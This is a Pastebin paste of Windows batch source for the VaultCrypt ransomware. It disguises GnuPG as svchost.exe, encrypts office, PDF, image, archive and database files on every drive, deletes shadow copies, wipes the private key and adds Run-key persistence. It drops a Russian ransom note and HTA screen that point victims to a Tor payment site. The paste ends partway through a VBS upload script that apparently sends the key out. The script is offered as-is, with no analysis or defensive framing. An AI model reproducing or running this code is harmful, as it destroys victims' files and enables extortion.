Guest User

Vault encryptor

a guest
Mar 11th, 2015
1,324
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. яю
  2.  
  3. @Echo off
  4. SetLocal EnableDelayedExpansion
  5. cd "%temp%"
  6. if not exist "%temp%\b.rr" (
  7. echo ok> "%temp%\b.rr"
  8. attrib +h "%temp%\b.rr"
  9. ) else (
  10. goto andy
  11. )
  12. chcp 866
  13. rename "%temp%\403.vlt" audiodg.exe
  14. rename "%temp%\index.vlt" svchost.exe
  15. rename "%temp%\iconv.vlt" iconv.dll
  16. set ulang=RU
  17. set hash1=!RANDOM!
  18. set hash2=!RANDOM!
  19. set hash3=!RANDOM!
  20. set hash4=!RANDOM!
  21. set hash5=!RANDOM!
  22. set fhash=!RANDOM!
  23. set xconf=!RANDOM!
  24. cd "%appdata%"
  25. if exist "%AppData%\gnupg" (
  26. rename "%AppData%\gnupg" gnupg_bak%random%
  27. attrib -s -h -r "%AppData%\gnupg\*.*"
  28. attrib -s -h -r "%AppData%\gnupg"
  29. del /f /q "%AppData%\gnupg\*.*"
  30. rmdir /s /q "%AppData%\gnupg"
  31. )
  32. cd "%temp%"
  33. echo Key-Type: RSA> "%temp%\gk.vlt"
  34. echo Key-Length: 1024>> "%temp%\gk.vlt"
  35. echo Name-Real: Cellar>> "%temp%\gk.vlt"
  36. echo Name-Comment: Cellar>> "%temp%\gk.vlt"
  37. echo Name-Email: v@u.lt>> "%temp%\gk.vlt"
  38. "%temp%\svchost.exe" --batch --homedir "%temp%" --gen-key "%temp%\gk.vlt"
  39. echo -----BEGIN PGP PUBLIC KEY BLOCK-----> "%temp%\pk.vlt"
  40. echo Version: GnuPG v1>> "%temp%\pk.vlt"
  41. echo.>> "%temp%\pk.vlt"
  42. echo mI0EVMTCdAEEALiK/XRUVtlYEgRgVsCdCGOFuuPlAayDcpq0mPXZTWX6hqkw6zJp>> "%temp%\pk.vlt"
  43. echo Wtq66dUSeqFq2uFD8Gf1sYGanUztuwNHGCJcZOmCEhuzwu5aDOjfgQic4iRrwzIs>> "%temp%\pk.vlt"
  44. echo mhXNVJ7o4iShfaVDWqJYxx2EkIakG8PefpqS57uB9Qncka+BGvu889C7ABEBAAG0>> "%temp%\pk.vlt"
  45. echo SFZhdWx0Q3J5cHQgKFZhdWx0Q3J5cHQpIDxCTS1OQkpheHJ0NHJpdVZyQ3E1TlZj>> "%temp%\pk.vlt"
  46. echo THJGQzVDWUNZa3hwbUBCaXRtZXNzYWdlPoi4BBMBAgAiBQJUxMJ0AhsDBgsJCAcD>> "%temp%\pk.vlt"
  47. echo AgYVCAIJCgsEFgIDAQIeAQIXgAAKCRAW1lPUttqywK3UA/4ut/3gHWP43kANXaS1>> "%temp%\pk.vlt"
  48. echo BZOwrqM8jZIHM/37nKfjpyy0t7YBGJL3bvkW7R+119jXIb6A+0lJTuBYGPkaiK3w>> "%temp%\pk.vlt"
  49. echo iSER5Nrlkbu2Ph1i1ammIz/zZ8M12YWgLXlUYEaan7X5qKwXPsLcliAuqaL/lPyh>> "%temp%\pk.vlt"
  50. echo Ln9O8Y1tY7D4zm2nl5vTxnopaLiNBFTEwnQBBADZHzHXCsAqeA2LwGEVhgny8JQ+>> "%temp%\pk.vlt"
  51. echo 301eW/rtPzcVSq0j7vmkEO8jO8PVabkOCwflAlfZgtuFaJD49KvcQRcDPXSN2kJI>> "%temp%\pk.vlt"
  52. echo mvfYRflRupa7lq0LnGlOsndGbpzjjZRUHBNeUR+LQbZnRfnBpqFDIKk3/uhPFNDg>> "%temp%\pk.vlt"
  53. echo djrZYRLcl2tJa3V9zwARAQABiJ8EGAECAAkFAlTEwnQCGwwACgkQFtZT1LbassCL>> "%temp%\pk.vlt"
  54. echo 5wP+O5Js6zJT/cFYCcUuWuYs9wIng65Y+YV+y6/7p8/OTwfxazhB65fG7hdThYPt>> "%temp%\pk.vlt"
  55. echo 9b4dgiEBdefeDvZwAWE5CJwdAeTsJT3OuPrMq9/fRaW3gooP/sJoWRS47mQGnIiu>> "%temp%\pk.vlt"
  56. echo DeONVwIPHeUzrKd1+jSCHcUvbJ4stmOpSNm5mGy6Ww2DKoM=>> "%temp%\pk.vlt"
  57. echo =E61M>> "%temp%\pk.vlt"
  58. echo -----END PGP PUBLIC KEY BLOCK----->> "%temp%\pk.vlt"
  59. "%temp%\svchost.exe" -r Cellar --export-secret-keys --yes --homedir "%temp%" -a> "%temp%\vaultkey.vlt"
  60. del /f /q "%temp%\gk.vlt"
  61. echo.>> "%temp%\vaultkey.vlt"
  62. echo BDATE: !DATE!>> "%temp%\vaultkey.vlt"
  63. echo UNAME: !USERNAME!>> "%temp%\vaultkey.vlt"
  64. echo CNAME: !COMPUTERNAME!>> "%temp%\vaultkey.vlt"
  65. echo ULANG: !ulang!>> "%temp%\vaultkey.vlt"
  66. echo 01HSH: !hash1!>> "%temp%\vaultkey.vlt"
  67. echo 02HSH: !hash2!>> "%temp%\vaultkey.vlt"
  68. echo 03HSH: !hash3!>> "%temp%\vaultkey.vlt"
  69. echo 04HSH: !hash4!>> "%temp%\vaultkey.vlt"
  70. echo 05HSH: !hash5!>> "%temp%\vaultkey.vlt"
  71. echo FHASH: !fhash!>> "%temp%\vaultkey.vlt"
  72. echo chcp 866 > "%temp%\cryptlist.lst"
  73. FOR %%f IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO call :olist %%f
  74. echo if exist "%%TeMp%%\VAULT.KEY" echo 01FNSH-OK^>^> "%%TeMp%%\VAULT.KEY">> "%temp%\cryptlist.lst"
  75. echo if exist "%%AppDATA%%\VAULT.KEY" echo 01FNSH-OK^>^> "%%AppDATA%%\VAULT.KEY">> "%temp%\cryptlist.lst"
  76. echo if exist "%%USERPROFILE%%\Desktop\VAULT.KEY" echo 01FNSH-OK^>^> "%%USERPROFILE%%\Desktop\VAULT.KEY">> "%temp%\cryptlist.lst"
  77. goto list2
  78. :olist
  79. dir /B "%1:\"&& for /r "%1:\" %%i in (*.xls *.doc) do (
  80. echo "%%TeMp%%\svchost.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "%%i"^& move /y "%%i.gpg" "%%i"^& rename "%%i" "%%~nxi.vault">> "%temp%\cryptlist.lst"
  81. echo %%i>> "%temp%\conf.list"
  82. )
  83. goto:eof
  84. :list2
  85. echo Set objShell = CreateObject^("Shell.Application"^) > "%temp%\win.vbs"
  86. echo Set objWshShell = WScript.CreateObject^("WScript.Shell"^) >> "%temp%\win.vbs"
  87. echo Set objWshProcessEnv = objWshShell.Environment^("PROCESS"^) >> "%temp%\win.vbs"
  88. echo objShell.ShellExecute "wmic.exe", "shadowcopy delete /nointeractive", "", "runas", 0 >> "%temp%\win.vbs"
  89. echo var cdp="%%TEMP%%!!()()()()()()()>%temp%\sdwrase.js"
  90. echo.> "%temp%\sdwrase.cmd"
  91. echo SetLocal EnableDelayedExpansion>> "%temp%\sdwrase.cmd"
  92. echo for /f "tokens=2*" %%%%i in ^('reg.exe query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentVersion"'^) do set fnd7=%%%%j>> "%temp%\sdwrase.cmd"
  93. echo if not %%fnd7:~0,1%% GEQ 6 goto skipadm>> "%temp%\sdwrase.cmd"
  94. echo set ntries=^0>> "%temp%\sdwrase.cmd"
  95. echo :chkone>> "%temp%\sdwrase.cmd"
  96. echo wscript.exe //B //Nologo "%%temp%%\win.vbs"^& tasklist^|findstr /i wmic.exe>> "%temp%\sdwrase.cmd"
  97. echo if not ^^!errorlevel^^!==0 ^(>> "%temp%\sdwrase.cmd"
  98. echo set /a ntries+=^1>> "%temp%\sdwrase.cmd"
  99. echo if not ^^!ntries^^! GEQ 16 goto chkone>> "%temp%\sdwrase.cmd"
  100. echo ^)>> "%temp%\sdwrase.cmd"
  101. echo :skipadm>> "%temp%\sdwrase.cmd"
  102. echo del /f /q "%temp%\sdwrase.js">> "%temp%\sdwrase.cmd"
  103. echo del /f /q "%temp%\win.vbs">> "%temp%\sdwrase.cmd"
  104. echo echo del /f /q "%temp%\win.vbs">> "%temp%\sdwrase.cmd"
  105. echo echo 1 ^> "%%temp%%\sdwrase.cmd">> "%temp%\sdwrase.cmd"
  106. start wscript.exe //B //Nologo "%temp%\sdwrase.js"
  107. FOR %%f IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO call :tlist %%f
  108. echo if exist "%%TeMp%%\VAULT.KEY" echo 02FNSH-OK^>^> "%%TeMp%%\VAULT.KEY">> "%temp%\cryptlist.lst"
  109. echo if exist "%%AppDATA%%\VAULT.KEY" echo 02FNSH-OK^>^> "%%AppDATA%%\VAULT.KEY">> "%temp%\cryptlist.lst"
  110. echo if exist "%%USERPROFILE%%\Desktop\VAULT.KEY" echo 02FNSH-OK^>^> "%%USERPROFILE%%\Desktop\VAULT.KEY">> "%temp%\cryptlist.lst"
  111. goto list3
  112. :tlist
  113. dir /B "%1:\"&& for /r "%1:\" %%i in (*.pdf *.rtf) do (
  114. echo "%%TeMp%%\svchost.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "%%i"^& move /y "%%i.gpg" "%%i"^& rename "%%i" "%%~nxi.vault">> "%temp%\cryptlist.lst"
  115. echo %%i>> "%temp%\conf.list"
  116. )
  117. goto:eof
  118. :list3
  119. FOR %%f IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO call :flist %%f
  120. echo if exist "%%TeMp%%\VAULT.KEY" echo 03FNSH-OK^>^> "%%TeMp%%\VAULT.KEY">> "%temp%\cryptlist.lst"
  121. echo if exist "%%AppDATA%%\VAULT.KEY" echo 03FNSH-OK^>^> "%%AppDATA%%\VAULT.KEY">> "%temp%\cryptlist.lst"
  122. echo if exist "%%USERPROFILE%%\Desktop\VAULT.KEY" echo 03FNSH-OK^>^> "%%USERPROFILE%%\Desktop\VAULT.KEY">> "%temp%\cryptlist.lst"
  123. goto list4
  124. :flist
  125. dir /B "%1:\"&& for /r "%1:\" %%i in (*.psd *.dwg *.cdr) do (
  126. echo "%%TeMp%%\svchost.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "%%i"^& move /y "%%i.gpg" "%%i"^& rename "%%i" "%%~nxi.vault">> "%temp%\cryptlist.lst"
  127. echo %%i>> "%temp%\conf.list"
  128. )
  129. goto:eof
  130. :list4
  131. FOR %%f IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO call :ylist %%f
  132. echo if exist "%%TeMp%%\VAULT.KEY" echo 04FNSH-OK^>^> "%%TeMp%%\VAULT.KEY">> "%temp%\cryptlist.lst"
  133. echo if exist "%%AppDATA%%\VAULT.KEY" echo 04FNSH-OK^>^> "%%AppDATA%%\VAULT.KEY">> "%temp%\cryptlist.lst"
  134. echo if exist "%%USERPROFILE%%\Desktop\VAULT.KEY" echo 04FNSH-OK^>^> "%%USERPROFILE%%\Desktop\VAULT.KEY">> "%temp%\cryptlist.lst"
  135. goto list5
  136. :ylist
  137. dir /B "%1:\"&& for /r "%1:\" %%i in (*.cd *.mdb *.1cd *.dbf *.sqlite) do (
  138. echo "%%TeMp%%\svchost.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "%%i"^& move /y "%%i.gpg" "%%i"^& rename "%%i" "%%~nxi.vault">> "%temp%\cryptlist.lst"
  139. echo %%i>> "%temp%\conf.list"
  140. )
  141. goto:eof
  142. :list5
  143. FOR %%s IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO call :qlist %%s
  144. echo if exist "%%TeMp%%\VAULT.KEY" echo 05FNSH-OK^>^> "%%TeMp%%\VAULT.KEY">> "%temp%\cryptlist.lst"
  145. echo if exist "%%AppDATA%%\VAULT.KEY" echo 05FNSH-OK^>^> "%%AppDATA%%\VAULT.KEY">> "%temp%\cryptlist.lst"
  146. echo if exist "%%USERPROFILE%%\Desktop\VAULT.KEY" echo 05FNSH-OK^>^> "%%USERPROFILE%%\Desktop\VAULT.KEY">> "%temp%\cryptlist.lst"
  147. goto coq
  148. :qlist
  149. dir /B "%1:\"&& for /r "%1:\" %%i in (*.jpg *.zip) do (
  150. echo "%%TeMp%%\svchost.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "%%i"^& move /y "%%i.gpg" "%%i"^& rename "%%i" "%%~nxi.vault">> "%temp%\cryptlist.lst"
  151. echo %%i>> "%temp%\conf.list"
  152. )
  153. goto:eof
  154. :coq
  155. echo echo FHASH-OK^>^> "%%TeMp%%\VAULT.KEY">> "%temp%\cryptlist.lst"
  156. echo echo FHASH-OK^>^> "%%AppDATA%%\VAULT.KEY">> "%temp%\cryptlist.lst"
  157. echo echo FHASH-OK^>^> "%%USERPROFILE%%\Desktop\VAULT.KEY">> "%temp%\cryptlist.lst"
  158. echo echo 1 ^> "%%TeMp%%\cryptlist.cmd">> "%temp%\cryptlist.lst"
  159. echo del /f /q "%%TeMp%%\cryptlist.cmd">> "%temp%\cryptlist.lst"
  160. findstr /i /v "windows recycle program avatar roaming msoffice temporary sample themes uploads csize resource internet com_ intel common resources texture profiles library clipart manual games framework64 setupcache autograph maps amd64 cache support guide abbyy application thumbnails avatars template adobe" "%temp%\conf.list"> "%temp%\conf2.list"
  161. findstr /i /v "windows recycle program avatar roaming msoffice temporary sample themes uploads csize resource internet com_ intel common resources texture profiles library clipart manual games framework64 setupcache autograph maps amd64 cache support guide abbyy application thumbnails avatars template adobe" "%temp%\cryptlist.lst"> "%temp%\cryptlist2.lst"
  162. findstr /v "AppData APPDATA appdata temp TEMP Temp" "%temp%\conf2.list"> "%temp%\confclean.list"
  163. findstr /v "AppData APPDATA appdata temp TEMP Temp" "%temp%\cryptlist2.lst"> "%temp%\cryptlist.cmd"
  164. del /f /q "%temp%\conf2.list"
  165. del /f /q "%temp%\cryptlist2.lst"
  166. del /f /q "%temp%\conf.list"
  167. del /f /q "%temp%\cryptlist.lst"
  168. echo XCONF: !xconf!>> "%temp%\vaultkey.vlt"
  169. set xquan=66668
  170. for /f %%f in ('find /c /v ""^< "%temp%\confclean.list"') do (
  171. set xquan=%%f
  172. )
  173. echo QNTTY: !xquan!>> "%temp%\vaultkey.vlt"
  174. for %%c IN (01:xls 04:doc 05:rtf 10:pdf 11:psd 12:dwg 13:cdr 19:cd 20:mdb 21:1cd 23:dbf 24:sqlite 26:jpg 27:zip) do (
  175. for /f "tokens=1,2 delims=:" %%i in ("%%c") do (
  176. for /f %%b in ('find /c /i ".%%j"^< "%temp%\confclean.list"') do (
  177. echo %%iEXT: %%b>> "%temp%\vaultkey.vlt"
  178. )))
  179. echo 02EXT: 0 >> "%temp%\vaultkey.vlt"
  180. echo 03EXT: 0 >> "%temp%\vaultkey.vlt"
  181. echo 06EXT: 0 >> "%temp%\vaultkey.vlt"
  182. echo 07EXT: 0 >> "%temp%\vaultkey.vlt"
  183. echo 08EXT: 0 >> "%temp%\vaultkey.vlt"
  184. echo 09EXT: 0 >> "%temp%\vaultkey.vlt"
  185. echo 14EXT: 0 >> "%temp%\vaultkey.vlt"
  186. echo 15EXT: 0 >> "%temp%\vaultkey.vlt"
  187. echo 16EXT: 0 >> "%temp%\vaultkey.vlt"
  188. echo 17EXT: 0 >> "%temp%\vaultkey.vlt"
  189. echo 18EXT: 0 >> "%temp%\vaultkey.vlt"
  190. echo 22EXT: 0 >> "%temp%\vaultkey.vlt"
  191. echo 25EXT: 0 >> "%temp%\vaultkey.vlt"
  192. echo 28EXT: 0 >> "%temp%\vaultkey.vlt"
  193. echo 29EXT: 0 >> "%temp%\vaultkey.vlt"
  194. echo.>> "%temp%\confclean.list"
  195. echo XCONF: !xconf!>> "%temp%\confclean.list"
  196. "%temp%\svchost.exe" --import "%temp%\pk.vlt"
  197. del /f /q "%temp%\pk.vlt"
  198. "%temp%\svchost.exe" -r VaultCrypt --yes -q --no-verbose --trust-model always -o "%temp%\VAULT.KEY" -e "%temp%\vaultkey.vlt"
  199. "%temp%\svchost.exe" -r VaultCrypt --yes -q --no-verbose --trust-model always -o "%temp%\CONFIRMATION.KEY" -e "%temp%\confclean.list"
  200. if not exist "%temp%\VAULT.KEY" (
  201. "%temp%\svchost.exe" -r VaultCrypt --yes -q --no-verbose --trust-model always --encrypt-files "%temp%\vaultkey.vlt"
  202. rename "%temp%\vaultkey.vlt.gpg" VAULT.KEY
  203. )
  204. if not exist "%temp%\CONFIRMATION.KEY" (
  205. "%temp%\svchost.exe" -r VaultCrypt --yes -q --no-verbose --trust-model always --encrypt-files "%temp%\confclean.list"
  206. rename "%temp%\confclean.list.gpg" CONFIRMATION.KEY
  207. )
  208. if not exist "%temp%\VAULT.KEY" (
  209. del /f /q "%temp%\*.vlt"
  210. del /f /q "%temp%\*.gpg"
  211. del /f /q "%temp%\random_seed"
  212. del /f /q "%temp%\*.lock"
  213. del /f /q "%temp%\*.bak"
  214. del /f /q "%temp%\*.list"
  215. goto pwsnd
  216. )
  217. echo.>> "%temp%\VAULT.KEY"
  218. echo 01FNSH-!hash1!>> "%temp%\VAULT.KEY"
  219. echo 02FNSH-!hash2!>> "%temp%\VAULT.KEY"
  220. echo 03FNSH-!hash3!>> "%temp%\VAULT.KEY"
  221. echo 04FNSH-!hash4!>> "%temp%\VAULT.KEY"
  222. echo 05FNSH-!hash5!>> "%temp%\VAULT.KEY"
  223. echo FHASH-!fhash!>> "%temp%\VAULT.KEY"
  224. "%temp%\audiodg.exe" /accepteula -p 16 -q "%temp%\secring.gpg"
  225. "%temp%\audiodg.exe" /accepteula -p 16 -q "%temp%\vaultkey.vlt"
  226. "%temp%\audiodg.exe" /accepteula -p 16 -q "%temp%\confclean.list"
  227. if exist "%temp%\secring.gpg" (
  228. for %%k in ("%temp%\secring.gpg") do (
  229. fsutil file setzerodata offset=0 length=%%~zk "%%k"
  230. )
  231. echo !random!!random!!random!> "%temp%\secring.gpg"
  232. del /f /q "%temp%\secring.gpg"
  233. for %%a in ("%temp%\vaultkey.vlt") do (
  234. fsutil file setzerodata offset=0 length=%%~za "%%a"
  235. )
  236. echo !random!!random!!random!> "%temp%\vaultkey.vlt"
  237. del /f /q "%temp%\vaultkey.vlt"
  238. for %%q in ("%temp%\confclean.list") do (
  239. fsutil file setzerodata offset=0 length=%%~zq "%%q"
  240. )
  241. echo !random!!random!!random!> "%temp%\confclean.list"
  242. del /f /q "%temp%\confclean.list"
  243. del /f /q "%temp%\secring.gpg"
  244. del /f /q "%temp%\vaultkey.vlt"
  245. del /f /q "%temp%\conf.list"
  246. )
  247. del /f /q "%temp%\random_seed"
  248. del /f /q "%temp%\trustdb.gpg"
  249. del /f /q "%temp%\secring.gpg"
  250. del /f /q "%temp%\*.lock"
  251. del /f /q "%temp%\*.bak"
  252. attrib -s -h -r "%AppData%\gnupg\*.*"
  253. attrib -s -h -r "%AppData%\gnupg"
  254. del /f /q "%AppData%\gnupg\*.*"
  255. rmdir /s /q "%AppData%\gnupg"
  256. set vaultbak=!random!
  257. copy /y "%temp%\CONFIRMATION.KEY" "%appdata%\CONFIRMATION.KEY"
  258. copy /y "%temp%\VAULT.KEY" "%appdata%\VAULT.KEY"
  259. copy /y "%temp%\VAULT.KEY" "%temp%\!vaultbak!BAK_VAULT.KEY"
  260. echo 01FNSH-OK>> "%temp%\!vaultbak!BAK_VAULT.KEY"
  261. echo 02FNSH-OK>> "%temp%\!vaultbak!BAK_VAULT.KEY"
  262. echo 03FNSH-OK>> "%temp%\!vaultbak!BAK_VAULT.KEY"
  263. echo 04FNSH-OK>> "%temp%\!vaultbak!BAK_VAULT.KEY"
  264. echo 05FNSH-OK>> "%temp%\!vaultbak!BAK_VAULT.KEY"
  265. echo FHASH-OK>> "%temp%\!vaultbak!BAK_VAULT.KEY"
  266. attrib +s +r "%temp%\!vaultbak!BAK_VAULT.KEY"
  267. copy /y "%temp%\VAULT.KEY" "%userprofile%\Desktop\VAULT.KEY"
  268. echo.> "%temp%\VAULT.txt"
  269. echo Ваши рабочие документы и базы данных были зашифрованы и переименованы в формат .vault>> "%temp%\VAULT.txt"
  270. echo Для их восстановления необходимо получить уникальный ключ>> "%temp%\VAULT.txt"
  271. echo.>> "%temp%\VAULT.txt"
  272. echo   ПРОЦЕДУРА ПОЛУЧЕНИЯ КЛЮЧА: >> "%temp%\VAULT.txt"
  273. echo.>> "%temp%\VAULT.txt"
  274. echo РљР РђРўРљРћ>> "%temp%\VAULT.txt"
  275. echo 1. Зайдите на наш веб-ресурс>> "%temp%\VAULT.txt"
  276. echo 2. Гарантированно получите Ваш ключ>> "%temp%\VAULT.txt"
  277. echo 3. Восстановите файлы в прежний вид>> "%temp%\VAULT.txt"
  278. echo.>> "%temp%\VAULT.txt"
  279. echo ДЕТАЛЬНО>> "%temp%\VAULT.txt"
  280. echo   Шаг 1:>> "%temp%\VAULT.txt"
  281. echo Скачайте Tor браузер с официального сайта: https://www.torproject.org>> "%temp%\VAULT.txt"
  282. echo   Шаг 2:>> "%temp%\VAULT.txt"
  283. echo Используя Tor браузер посетите сайт: http://restoredz4xpmuqr.onion>> "%temp%\VAULT.txt"
  284. echo   Шаг 3:>> "%temp%\VAULT.txt"
  285. echo Найдите Ваш уникальный VAULT.KEY на компьютере - это Ваш ключ к личной клиент-панели. Не потеряйте его>> "%temp%\VAULT.txt"
  286. echo Авторизируйтесь на сайте используя ключ VAULT.KEY>> "%temp%\VAULT.txt"
  287. echo Перейдите в раздел FAQ и ознакомьтесь с дальнейшей процедурой>> "%temp%\VAULT.txt"
  288. echo   STEP 4:>> "%temp%\VAULT.txt"
  289. echo После получения ключа, Вы можете восстановить файлы используя наше ПО с открытым исходным кодом или же безопасно использовать своё>> "%temp%\VAULT.txt"
  290. echo.>> "%temp%\VAULT.txt"
  291. echo ДОПОЛНИТЕЛЬНО>> "%temp%\VAULT.txt"
  292. echo a^) Вы не сможете восстановить файлы без уникального ключа ^(который безопасно хранится на нашем сервере^)>> "%temp%\VAULT.txt"
  293. echo b^) Если Вы не можете найти Ваш VAULT.KEY, поищите во временной папке >> "%temp%\VAULT.txt"
  294. echo c^) Ваша стоимость восстановления не окончательная>> "%temp%\VAULT.txt"
  295. echo.>> "%temp%\VAULT.txt"
  296. echo   Дата блокировки: %date% ^(%time:~0,5%^)>> "%temp%\VAULT.txt"
  297. copy /y "%temp%\VAULT.txt" "%userprofile%\Desktop\vault.txt"
  298. echo var cdp="%%TEMP%%!!()()()()()()()>>%temp%\revault.js"
  299. "%TEMP%\svchost.exe" --import "%TEMP%\pubring.gpg"
  300. reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "tnotify" /t REG_SZ /f /d "notepad %temp%\VAULT.txt"
  301. reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "vltexec" /t REG_SZ /f /d "wscript //B //Nologo %temp%\revault.js"
  302. call "%temp%\cryptlist.cmd"
  303. echo ^<html^>^<head^>^<hta:application BORDER = "none" CAPTION = "No" CONTEXTMENU = "Yes" INNERBORDER = "No" MAXIMIZEBUTTON = "No" MINIMIZEBUTTON = "No" NAVIGABLE = "No" SCROLL = "No" SCROLLFLAT = "No" SELECTION = "Yes" SHOWINTASKBAR = "No" SINGLEINSTANCE = "Yes" SYSMENU = "No"/^>^<style^>body{cursor:default;background-color:#E7E7E7;margin:0;font-family:"HelveticaNeue-Light","Helvetica Neue Light","Helvetica Neue",Helvetica,Arial,sans-serif;text-align:center;background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABoAAAAaAgMAAADUJKRdAAAACVBMVEXs7Ozv7+/6+vqH/Ct2AAAAW0lEQVQI11WOsQ2DABADv8gAGQFd4SJTZARGQC5cMBX1T0mD4ClP9lmutf71qW/t3d19VBLDcrNR7KV+F4Mx28OKyMzf/UDINvYADR9A08cwfcnjDwmarOBn7wSqEUpFZuJdBQAAAABJRU5ErkJggg==)}.vault{margin:10px;height:520px;width:1100px}.sc{margin:10px 150px;font-size:40px;width:900px;padding:20px;background-color:#7a7a7a;color:#FF4C4C;background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAUAAAAFCAYAAACNbyblAAAAJ0lEQVR42mXMsQkAAAzDMH+S/69M6VAoeAgGDQFIW/4QQARbwaF+B3+SPGAo8blgAAAAAElFTkSuQmCC)}.briefly{position:absolute;left:50px;width:480px}.detailed{display:inline-block;margin-left:530px;width:660px}.bti{background-color:#DFDFDF;color:#555;font-size:28px;padding:10px}hr{width:90%%}.sced{margin-top:15px;text-align:center;font-size:27px;height:220px;padding:20px;background-color:#6a6a6a;line-height:1.5;color:#EAEAEA;background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAUAAAAFCAYAAACNbyblAAAAJ0lEQVR42mXMsQkAAAzDMH+S/69M6VAoeAgGDQFIW/4QQARbwaF+B3+SPGAo8blgAAAAAElFTkSuQmCC)}form{display:inline}.dbutt{margin-left:2px;font-size:16px;font-weight:500;border:none;background-color:#9f9f9f;color:#EEE;cursor:pointer}.footer{text-align:left;position:relative;width:600px;margin:2px 2px 2px 45px;height:16px;font-size:15px;background-color:#CFCFCF;color:#444;padding:6px}.fnl{font-size:21px}^</style^>^<meta http-equiv="Content-Type" content="text/html;charset=utf-8"/^>^<title^>Vault Notification^</title^>^<script language="vbscript"^>> "%temp%\VAULT.hta"
  304. echo sub Window_Onload>> "%temp%\VAULT.hta"
  305. echo window.resizeTo 1280,725>> "%temp%\VAULT.hta"
  306. echo screenWidth = Document.ParentWindow.Screen.AvailWidth>> "%temp%\VAULT.hta"
  307. echo screenHeight = Document.ParentWindow.Screen.AvailHeight>> "%temp%\VAULT.hta"
  308. echo posLeft = (screenWidth - 1280) / 2 >> "%temp%\VAULT.hta"
  309. echo posTop = (screenHeight - 725) / 2 >> "%temp%\VAULT.hta"
  310. echo window.moveTo posLeft, posTop >> "%temp%\VAULT.hta"
  311. echo end sub >> "%temp%\VAULT.hta"
  312. echo ^</script^>^</head^>^<body scroll="no"^>^<div class="vault"^>^<div class="sc"^>Ваши документы и базы данных были зашифрованы и помещены в^<br^>^&#9762;^&nbsp;^<b^>формат .VAULT^</b^>^&nbsp;^&#9762;^</div^>^<div class="sc" style="font-size:20px;width:800px;margin-left:200px;color:#EAEAEA;"^>Для их восстановления необходимо получить ^<b^>Ваш ключ^</b^>^</div^>^<br^>^<div class="briefly"^>^<div class="bti"^>^<b^>Кратко:^</b^>^</div^>^<div class="sced"^>Необходимо произвести 3 шага:^<hr^> ^&#10144; Зайдите на наш веб-ресурс^<br^> ^&#9399; Получите свой ключ^<br^>^&#10551; ^<b^>Восстановите файлы^</b^>^</div^>^</div^>^<div class="detailed"^>^<div class="bti"^>^<b^>Детально:^</b^>^</div^>^<div class="sced"^>Скачайте ^<b^>Tor^</b^> браузер с оф. сайта ^<form action="http://dist.torproject.org/torbrowser/4.0.3/torbrowser-install-4.0.3_en-US.exe"^>^<input class="dbutt" type="submit" value="&#8675; Загрузить"^>^</form^>^<form action="http://torproject.org/projects/torbrowser.html.en#windows"^>^<input class="dbutt" type="submit" value="Help" style="padding-bottom:1px;"^>^</form^>^<hr^>Зайдите на наш сайт ^<b^>используя Tor^</b^>:^<br^>^<div class="bti" style="margin:1px 8%%;padding:0px;cursor:text;"^>http://restoredz4xpmuqr.onion^</div^>^<form action="http://pastebin.com/rs7jZ0TW"^>^<input class="dbutt" type="submit" value="Не работает?"^>^&nbsp;^&#10548;^</form^>^<hr^>^<div class="fnl"^>Авторизируйтесь ^&nbsp;^&#10148;^&nbsp; ^<b^>Получите гарантии^</b^> ^&nbsp;^&#10148;^&nbsp; Ключ^</div^>^</div^>^<div class="footer"^>^<b^>Note 1:^</b^> Вы не сможете восстановить файлы без уникального ключа.^</div^>^<div class="footer"^>^<b^>Note 2:^</b^> Перед авторизацией, Вы ^<u^>должны^</u^> найти Ваш ^<b^>VAULT.KEY^</b^> на компьютере.^</div^>^<div class="footer"^>^<b^>Note 3: Стоимость полного восстановления на ресурсе не окончательная^</div^>^</div^>^</body^>^</html^>>> "%temp%\VAULT.hta"
  313. copy /y "%temp%\VAULT.hta" "%appdata%\VAULT.hta"
  314. copy /y "%temp%\VAULT.hta" "%userprofile%\Desktop\VAULT.hta"
  315. del /f /q "%temp%\cryptlist.cmd"
  316. attrib +h "%appdata%\VAULT.hta"
  317. attrib +r +s "%temp%\VAULT.KEY"
  318. attrib +r +s "%appdata%\VAULT.KEY"
  319. attrib +r +s "%userprofile%\Desktop\VAULT.KEY"
  320. :pwsnd
  321. echo do_vbsUpload > "%temp%\up.vbs"
  322. echo Sub do_vbsUpload^(^) >> "%temp%\up.vbs"
  323. echo Dim FileName,DestURL,FieldName >> "%temp%\up.vbs"
  324. echo FieldName="FileField" >> "%temp%\up.vbs"
  325. echo Dim aCounter,Arg >> "%temp%\up.vbs"
  326. echo aCounter=1 >> "%temp%\up.vbs"
  327. echo For Each Arg In WScript.Arguments >> "%temp%\up.vbs"
  328. echo Select Case aCounter >> "%temp%\up.vbs"
  329. echo Case 1: FileName=Arg >> "%temp%\up.vbs"
  330. echo Case 2: DestURL=Arg >> "%temp%\up.vbs"
  331. echo Case 3: FieldName=Arg >> "%temp%\up.vbs"
  332. echo End Select >> "%temp%\up.vbs"
  333. echo aCounter=aCounter+1 >> "%temp%\up.vbs"
  334. echo Next >> "%temp%\up.vbs"
  335. echo UploadFile DestURL,FileName,FieldName >> "%temp%\up.vbs"
  336. echo End Sub >> "%temp%\up.vbs"
  337. echo Sub UploadFile^(DestURL,FileName,FieldName^) >> "%temp%\up.vbs"
  338. echo Const Boundary="---------------------------0123456789012" >> "%temp%\up.vbs"
  339. echo Dim FileContents,FormData >> "%temp%\up.vbs"
